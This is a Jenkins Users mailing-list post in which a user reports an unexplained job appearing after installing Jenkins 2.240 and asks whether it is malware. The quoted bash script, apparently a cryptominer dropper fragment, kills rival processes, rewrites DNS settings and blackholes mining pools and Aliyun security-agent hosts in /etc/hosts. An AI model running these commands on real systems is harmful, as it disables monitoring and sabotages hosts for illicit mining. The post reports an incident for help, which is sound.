Potential Malware

Mon, 22 Jun 2020 10:15:25 -0700 

Hi All,

We just installed Jenkins 2.240 and suddenly there is a job with some 
really strange content, including:

#!/bin/bash

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head 
-n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
    killall trace;pkill -9 -f trace;killall -s SIGKILL trace
    killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
    killall viunix;pkill viunix;killall -s SIGKILL viunix
    kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
    kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
    kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
    echo kill
}

ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> 
/etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" 
>> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> 
/etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo 
"0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> 
/etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 
pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> 
/etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0 minexmr.com" >> /etc/hosts

This is really creepy because this script cannot possibly run on our system 
(the good part). The bad part is that no one in our organization created 
this job. Is it possible that there is some malware floating around? Our 
Jenkins instance is hiding behind a firewall so there's no way in.

Thanks,
Randall

-- 
You received this message because you are subscribed to the Google Groups 
"Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to jenkinsci-users+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.

Reply via email to